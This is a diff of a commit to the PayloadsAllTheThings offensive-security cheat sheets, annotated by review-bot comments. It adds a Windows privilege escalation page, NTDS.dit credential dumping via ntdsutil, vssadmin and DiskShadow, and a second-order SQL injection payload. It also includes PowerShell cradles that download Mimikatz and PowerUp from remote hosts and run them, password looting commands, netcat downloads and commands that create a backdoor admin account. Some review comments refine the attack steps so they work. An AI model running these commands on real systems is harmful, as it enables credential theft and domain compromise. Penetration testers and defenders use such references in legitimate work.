mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Windows PrivEsc + SQLi second order + AD DiskShadow
This commit is contained in:
parent
f1cb7ce50e
commit
e261836532
6 changed files with 215 additions and 17 deletions
|
@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
|
||||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
||||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||||||
```
|
```
|
||||||
|
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
|
||||||
|
|
||||||
## Most common paths to AD compromise
|
## Most common paths to AD compromise
|
||||||
|
|
||||||
|
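Review bot: the new ADAPE-Script bullet is a bare link with no hint of what the script does, while the two cradles above it are self-describing (PowerUp `Invoke-AllChecks`, Invoke-Mimikatz). A short parenthetical such as "(runs PowerView/PowerUp/mimikatz-style checks in one pass)" would let a reader decide whether to pull it before clicking through.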
@ -82,36 +83,59 @@ Get-NetGPOGroup
|
||||||
|
|
||||||
|
|
||||||
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
|
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
|
||||||
```c
|
**Using ndtsutil**
|
||||||
|
```powershell
|
||||||
C:\>ntdsutil
|
C:\>ntdsutil
|
||||||
ntdsutil: activate instance ntds
|
ntdsutil: activate instance ntds
|
||||||
ntdsutil: ifm
|
ntdsutil: ifm
|
||||||
ifm: create full c:\pentest
|
ifm: create full c:\pentest
|
||||||
ifm: quit
|
ifm: quit
|
||||||
ntdsutil: quit
|
ntdsutil: quit
|
||||||
|
```
|
||||||
|
|
||||||
or
|
**Using Vshadow**
|
||||||
|
```powershell
|
||||||
vssadmin create shadow /for=C :
|
vssadmin create shadow /for=C :
|
||||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
**Using DiskShadow (a Windows signed binary)**
|
||||||
|
```powershell
|
||||||
|
diskshadow.txt contains :
|
||||||
|
set context persistent nowriters
|
||||||
|
add volume c: alias someAlias
|
||||||
|
create
|
||||||
|
expose %someAlias% z:
|
||||||
|
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
|
||||||
|
delete shadows volume %someAlias%
|
||||||
|
reset
|
||||||
|
|
||||||
|
then:
|
||||||
|
diskshadow.exe /s c:\diskshadow.txt
|
||||||
|
dir c:\exfil
|
||||||
|
reg.exe save hklm\system c:\exfil\system.bak
|
||||||
|
```
|
||||||
|
|
||||||
|
**Extract hashes from ntds.dit**
|
||||||
then you need to use secretsdump to extract the hashes
|
then you need to use secretsdump to extract the hashes
|
||||||
```c
|
```c
|
||||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
Metasploit module
|
**Alternatives - modules**
|
||||||
|
Metasploit modules
|
||||||
```c
|
```c
|
||||||
windows/gather/credentials/domain_hashdump
|
windows/gather/credentials/domain_hashdump
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
PowerSploit module
|
PowerSploit module
|
||||||
```
|
```
|
||||||
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
### Golden Tickets
|
### Golden Tickets
|
||||||
Forge a TGT, require krbtgt key
|
Forge a TGT, require krbtgt key
|
||||||
|
|
||||||
|
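Review bot: the file names in this section do not line up, so a reader following it verbatim ends up with a hive called `c:\exfil\system.bak` and a secretsdump command that looks for `SYSTEM` (`secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL`); either save the hive as `c:\exfil\SYSTEM` or pass `-system system.bak`. Also note that the `ifm: create full c:\pentest` path already writes the SYSTEM and SECURITY hives under `c:\pentest\registry`, so the `reg.exe save hklm\system` step is only needed for the vssadmin and DiskShadow variants; a sentence saying so would save a redundant hive dump. Smaller points in the same hunk: the added heading reads `**Using ndtsutil**` (typo for `ntdsutil`); `**Using Vshadow**` names the SDK tool vshadow.exe but the command shown is `vssadmin`, and `vssadmin create shadow /for=C :` has a stray space before the colon (`/for=C:`); the `Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit` line should show the real shape of that value, `\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\windows\ntds\ntds.dit`, which `copy` accepts as-is. The DiskShadow script copies into `c:\exfil\` but nothing creates that directory, so add `mkdir c:\exfil` before `diskshadow.exe /s c:\diskshadow.txt`. The unchanged `Invoke-NinjaCopy --path ... --localdestination` line uses GNU-style double dashes; PowerSploit's parameters are `-Path`, `-LocalDestination` and `-Verbose`. Finally, the new ` ```c ` fences around the secretsdump and Metasploit module blocks give C highlighting to shell and msf text; ` ```powershell ` or a bare fence, as used for the neighbouring blocks, would be consistent.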
@ -268,3 +292,4 @@ net group "Domain Admins" hacker2 /add /domain
|
||||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||||
|
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
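Review bot: the context line `*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](...)` has no space after the asterisk, so Markdown renders it as emphasis markup rather than a list item; since this hunk already touches the reference list, adding the space (`* [Fun with LDAP...`) would fix the rendering of the whole list.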
157
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
|
@ -0,0 +1,157 @@
|
||||||
|
# Windows - Privilege Escalation
|
||||||
|
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
|
||||||
|
|
||||||
|
|
||||||
|
## Windows Version and Configuration
|
||||||
|
```powershell
|
||||||
|
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||||||
|
```
|
||||||
|
|
||||||
|
Architecture
|
||||||
|
```powershell
|
||||||
|
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
List all env variables
|
||||||
|
```powershell
|
||||||
|
set
|
||||||
|
```
|
||||||
|
|
||||||
|
List all drives
|
||||||
|
```powershell
|
||||||
|
wmic logicaldisk get caption || fsutil fsinfo drives
|
||||||
|
```
|
||||||
|
|
||||||
|
## User Enumeration
|
||||||
|
|
||||||
|
Get current username
|
||||||
|
```powershell
|
||||||
|
echo %USERNAME% || whoami
|
||||||
|
```
|
||||||
|
|
||||||
|
List all users
|
||||||
|
```powershell
|
||||||
|
net user
|
||||||
|
whoami /all
|
||||||
|
```
|
||||||
|
|
||||||
|
List logon requirements; useable for bruteforcing
|
||||||
|
```powershell
|
||||||
|
net accounts
|
||||||
|
```
|
||||||
|
|
||||||
|
Get details about a user (i.e. administrator, admin, current user)
|
||||||
|
```powershell
|
||||||
|
net user administrator
|
||||||
|
net user admin
|
||||||
|
net user %USERNAME%
|
||||||
|
```
|
||||||
|
|
||||||
|
List all local groups
|
||||||
|
```powershell
|
||||||
|
net localgroup
|
||||||
|
```
|
||||||
|
|
||||||
|
Get details about a group (i.e. administrators)
|
||||||
|
```powershell
|
||||||
|
net localgroup administrators
|
||||||
|
```
|
||||||
|
|
||||||
|
## Network Enumeration
|
||||||
|
|
||||||
|
List all network interfaces
|
||||||
|
```powershell
|
||||||
|
ipconfig /all
|
||||||
|
```
|
||||||
|
|
||||||
|
List current routing table
|
||||||
|
```powershell
|
||||||
|
route print
|
||||||
|
```
|
||||||
|
|
||||||
|
List the ARP table
|
||||||
|
```powershell
|
||||||
|
arp -A
|
||||||
|
```
|
||||||
|
|
||||||
|
List all current connections
|
||||||
|
```powershell
|
||||||
|
netstat -ano
|
||||||
|
```
|
||||||
|
|
||||||
|
List firware state and current configuration
|
||||||
|
```powershell
|
||||||
|
netsh advfirewall firewall dump
|
||||||
|
```
|
||||||
|
|
||||||
|
List all network shares
|
||||||
|
```powershell
|
||||||
|
net share
|
||||||
|
```
|
||||||
|
|
||||||
|
## Looting for passwords
|
||||||
|
|
||||||
|
Search for file contents
|
||||||
|
```powershell
|
||||||
|
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
Search for a file with a certain filename
|
||||||
|
```powershell
|
||||||
|
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||||
|
```
|
||||||
|
|
||||||
|
Search the registry for key names
|
||||||
|
```powershell
|
||||||
|
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||||
|
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||||
|
```
|
||||||
|
|
||||||
|
Read a value of a certain sub key
|
||||||
|
```powershell
|
||||||
|
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||||
|
```
|
||||||
|
|
||||||
|
## Processes Enum
|
||||||
|
What processes are running?
|
||||||
|
```powershell
|
||||||
|
tasklist /v
|
||||||
|
```
|
||||||
|
|
||||||
|
Which processes are running as "system"
|
||||||
|
```powershell
|
||||||
|
tasklist /v /fi "username eq system"
|
||||||
|
```
|
||||||
|
|
||||||
|
Do you have powershell magic?
|
||||||
|
```powershell
|
||||||
|
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Uploading / Downloading files
|
||||||
|
a wget using powershell
|
||||||
|
```powershell
|
||||||
|
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
wget using bitsadmin (when powershell is not present)
|
||||||
|
```powershell
|
||||||
|
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
|
||||||
|
```powershell
|
||||||
|
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
## Spot the weak service using PowerSploit's PowerUP
|
||||||
|
```powershell
|
||||||
|
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||||
|
```
|
||||||
|
|
||||||
|
## Thanks to
|
||||||
|
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||||
|
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||||
|
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
|
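Review bot: nearly every block in the new file is fenced as ` ```powershell ` but contains cmd.exe syntax (`echo %USERNAME% || whoami`, `wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%`, `cd C:\ & findstr ...`, `REG QUERY ...`); in a PowerShell prompt `%VAR%` is not expanded and `||` is a syntax error on the Windows PowerShell versions this page targets, so the fences should read ` ```cmd ` (or the text should say the commands are for cmd.exe). Other points: "List firware state and current configuration" should read "firewall"; the sentence "can be executed from %TEMP%wget" is missing the backslash (`%TEMP%\wget.exe`); the PowerUp cradle pulls from `PowerShellEmpire/PowerTools`, which is a deprecated repository, while PowerUp is maintained under PowerSploit (`Privesc/PowerUp.ps1`), and forcing `-Version 2` will fail on hosts where the PowerShell 2.0 engine is not installed; the wget.exe and nc.exe downloads point at a third-party host (addaxsoft.com), so the text should tell the reader to stage those binaries on their own server rather than fetching them from the internet during an engagement. In "Thanks to", "Basic Linux Privilege Escalation" (g0tmi1k) is a Linux reference and belongs on the Linux page, not this one.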
@ -1,9 +1,14 @@
|
||||||
# Windows - Using credentials
|
# Windows - Using credentials
|
||||||
Little tip, if you don't have credentials yet :D
|
Little tip, if you don't have credentials yet :D
|
||||||
```
|
```powershell
|
||||||
net user hacker hacker /add
|
net user hacker hacker /add
|
||||||
net localgroup administrators hacker /add
|
net localgroup administrators hacker /add
|
||||||
```
|
```
|
||||||
|
Some info about your user
|
||||||
|
```powershell
|
||||||
|
net user /dom
|
||||||
|
net user /domain
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Metasploit - SMB
|
## Metasploit - SMB
|
||||||
|
|
|
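Review bot: the new "Some info about your user" block does not do what it says: `net user /dom` and `net user /domain` are the same command (`/dom` is just the abbreviated switch) and both list every account in the domain rather than describing the current user. Keep one of the two lines and, for the user's own details, show `net user %USERNAME% /domain` (group membership, password expiry, logon hours) alongside `whoami /all` for SID, groups and privileges.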
@ -1,6 +1,6 @@
|
||||||
# POSTGRESQL
|
# POSTGRESQL
|
||||||
|
|
||||||
## PostgreSQL Comment
|
## PostgreSQL Comments
|
||||||
```
|
```
|
||||||
--
|
--
|
||||||
/**/
|
/**/
|
||||||
|
|
|
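Review bot: while renaming the heading to "PostgreSQL Comments", the block below it could take the ` ```sql ` fence that the sibling SQLite file uses for the same two comment forms (`--`, `/**/`); the PostgreSQL file currently uses a bare fence, so the two cheat sheets render differently for identical content.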
@ -2,13 +2,19 @@
|
||||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
* [Entry point detection](#)
|
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
|
||||||
* [DBMS Identification](#)
|
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
|
||||||
* [SQL injection using SQLmap](#)
|
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
|
||||||
* [Authentication bypass](#)
|
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
|
||||||
* [Polyglot injection](#)
|
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
|
||||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
|
* [Entry point detection](#entry-point-detection)
|
||||||
* [WAF Bypass](#)
|
* [DBMS Identification](#dbms-identification)
|
||||||
|
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||||
|
* [Authentication bypass](#authentication-bypass)
|
||||||
|
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||||
|
* [Second order injection](#second-order-injection)
|
||||||
|
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
||||||
|
* [WAF Bypass](#waf-bypass)
|
||||||
|
|
||||||
|
|
||||||
## Entry point detection
|
## Entry point detection
|
||||||
|
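Review bot: the five new "CheatSheet ... Injection" entries use absolute `https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/...` URLs while the entries below them are relative in-page anchors; relative paths (`MSSQL%20Injection.md`, `MySQL%20Injection.md`, ...) would keep forks, mirrors and branches pointing at their own copies instead of upstream master. Also double-check that the anchor `#polyglot-injection-multicontext` matches the slug GitHub generates for the actual heading text, since the other anchors were regenerated here and this one is the only one whose heading is not visible in the diff.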
@ -275,6 +281,11 @@ admin") or "1"="1"/*
|
||||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Second order injection
|
||||||
|
```sql
|
||||||
|
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||||
|
```
|
||||||
|
|
||||||
## Insert Statement - ON DUPLICATE KEY UPDATE
|
## Insert Statement - ON DUPLICATE KEY UPDATE
|
||||||
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
||||||
```sql
|
```sql
|
||||||
|
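Review bot: the new "Second order injection" section is a single payload with no explanation of what makes it second order, so it reads like a plain UNION injection. One sentence would fix that: the payload is stored by an innocuous first request (for example as a username at registration, where it is escaped correctly) and fires later when the application reuses the stored value unescaped in another query (for example a password reset or login lookup). It would also help to say that the two-column `SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'` matches a specific `username, password` query shape and that the second value is the MD5 of `1234`, so both the column count and the hash format must be adapted to the target.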
@ -392,7 +403,7 @@ mysql> mysql> select version();
|
||||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||||
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
||||||
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
||||||
* MSQQL:
|
* MSSQL:
|
||||||
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||||
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||||
* ORACLE:
|
* ORACLE:
|
||||||
|
|
|
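Review bot: the context lines `[Reiners mySQL injection Filter Evasion Cheatsheet] (https://...)`, `[EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://...)` and `[PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://...)` all have a space between `]` and `(`, which Markdown does not treat as a link, so these references render as bracketed text followed by a raw URL in parentheses. Since this hunk already edits the list (MSQQL to MSSQL), removing that space in the three entries would make them clickable like the others.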
@ -1,6 +1,6 @@
|
||||||
# SQLite Injection
|
# SQLite Injection
|
||||||
|
|
||||||
## SQLite comment
|
## SQLite comments
|
||||||
```sql
|
```sql
|
||||||
--
|
--
|
||||||
/**/
|
/**/
|
||||||
|
|